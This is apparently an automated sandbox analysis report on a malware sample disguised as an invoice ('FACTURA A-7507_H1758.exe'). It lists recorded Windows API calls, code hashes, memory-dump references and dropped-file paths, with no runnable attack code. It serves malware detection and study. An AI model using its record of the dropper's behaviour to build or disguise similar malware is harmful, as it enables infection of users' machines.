                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                          • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                                                                                          • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,?,004040A3), ref: 00404285
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                                                                                                                                                                                          • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          • Opcode ID: f9d451d74586546bbd407ca2e24b621689a583ca5f98dcf473e6f9f09c96531a
                                                                                                                                                                                                                          • Instruction ID: 98ea867d558ea3f6c4ea23e9af3ccb97d5497e9459daf2a95be3f4ba7839a378
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d451d74586546bbd407ca2e24b621689a583ca5f98dcf473e6f9f09c96531a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7D01277B14100DBD760EFB9BF89C6F73A9EB513293214837D902E11A2D57DC812462D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040547A
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405489
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004054C6
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 004054CD
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054EE
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054FF
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405512
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405520
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405533
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405555
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405569
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040558A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B3
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055BF
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405498
                                                                                                                                                                                                                            • Part of subcall function 00404277: SendMessageW.USER32(00000028,?,?,004040A3), ref: 00404285
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055DC
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000053B0,00000000), ref: 004055EA
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004055F1
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405615
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040561A
                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405664
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405698
                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004056A9
                                                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056BD
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004056DD
                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056F6
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040572E
                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040573E
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405744
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405750
                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0040575A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040576E
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040578E
                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405799
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040579F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                          • String ID: (7B${
                                                                                                                                                                                                                          • API String ID: 590372296-525222780
                                                                                                                                                                                                                          • Opcode ID: bb3fbbfb339c73c7f4eaa2fafe416b05982b245f29a0fe8eabc07e204e53b29a
                                                                                                                                                                                                                          • Instruction ID: 916ab36d0f469a383f2c04aed4d67e33a9af93c646c7432e75c1414f8414c4dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb3fbbfb339c73c7f4eaa2fafe416b05982b245f29a0fe8eabc07e204e53b29a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44B15670900608FFDB119FA0DD89EAE3B79FB48354F40847AFA45A61A0CB754E52DF68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040472C
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404756
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404807
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404812
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 00404844
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404850
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404862
                                                                                                                                                                                                                            • Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA
                                                                                                                                                                                                                            • Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                                                                                                                                                                                            • Part of subcall function 00406412: CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                                                                                                                                                                                            • Part of subcall function 00406412: CharNextW.USER32(?,00000000,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                                                                                                                                                                                            • Part of subcall function 00406412: CharPrevW.USER32(?,?,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404925
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 00404A99: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                                                                                                                                                                                            • Part of subcall function 00404A99: wsprintfW.USER32 ref: 00404B43
                                                                                                                                                                                                                            • Part of subcall function 00404A99: SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: (7B$868$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration$Call
                                                                                                                                                                                                                          • API String ID: 2624150263-3649986087
                                                                                                                                                                                                                          • Opcode ID: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                                                                                                                                                                                          • Instruction ID: d5aaf60bd55b21875b9c8b9a8d0b3d7e01f34e6f89f3adcbdcc63617e1d21faf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7A191F1A00209ABDB11AFA5CC45AAF77B8EF84354F10847BF601B62D1D77C99418B6D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn, xrefs: 00402154
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn
                                                                                                                                                                                                                          • API String ID: 542301482-1441128270
                                                                                                                                                                                                                          • Opcode ID: 4186039756558c631eee119f4fdf18c30d8387add4dff58370c0f886253180e0
                                                                                                                                                                                                                          • Instruction ID: a109dbacb2976faa502b9a92b0b1fafcf02ea9b6fb783d383e2774f19d5eba59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4186039756558c631eee119f4fdf18c30d8387add4dff58370c0f886253180e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA412C75A00209AFCF00DFA4CD88AAD7BB6FF48314B20457AF515EB2D1DBB99A41CB54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040447D
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404491
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004044AE
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004044BF
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044CD
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044DB
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004044E0
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044ED
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404502
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040455B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404562
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040458D
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D0
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045DE
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004045E1
                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,?), ref: 004045F6
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404602
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404605
                                                                                                                                                                                                                          • SendMessageW.USER32(00000111,?,00000000), ref: 00404634
                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404646
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                          • String ID: Call$N$VC@$open
                                                                                                                                                                                                                          • API String ID: 3615053054-2503634124
                                                                                                                                                                                                                          • Opcode ID: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                                                                                                                                                                                          • Instruction ID: ef28e404984a924d02769b335405a58d84a4f5c10dd13b46e9d300bde90bb2c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 717191B1A00209BFDB10AF60DD45E6A7B69FB94344F00843AFB05B62E0D779AD51CF98
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                          • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                                                                                                                                                                                          • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,00406040,?,?), ref: 00405EBC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00406040,?,?), ref: 00405EE0
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405EE9
